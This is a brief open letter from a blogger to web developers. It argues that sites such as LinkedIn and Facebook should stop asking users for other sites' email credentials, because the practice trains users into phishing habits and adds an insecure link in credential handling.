Dear Web Developers,

It’s not kosher to request login information for other websites. Both LinkedIn and Facebook are guilty of asking for your various email credentials so they can harvest your address list under the guise of “making it easier to find your friends” and they are by no means unique in this practice. Doing so does two things- first it makes users accustomed to disclosing credentials to websites unrelated to the site the credentials correspond to. Phishing is a huge issue folks, and we have a hard enough time just getting users to be aware that they really are on their bank website. About the last thing we want is to water down that message and get them accustomed to providing that information on sites they clearly see aren’t the site corresponding to the credentials. Unless you move to two factor authentication the only real way to protect against phishing is user education and training, and this practice completely torpedoes that effort.

The other issue is that you are introducing another link into an already vulnerable chain. Not only does google have to worry about the gmail credentials being properly handled on their site (only sent over SSL, hashed in the database, no sql injection to disclose them, etc), but they now have to worry about how your site secures those credentials (I bet you aren’t hashing the values, since you need to use them outside your system) and they really have no control over it.

So Please, quit asking for credentials to other sites- don’t do what attackers do, otherwise you don’t give people an easy way to distinguish between the two.

~ Joshbw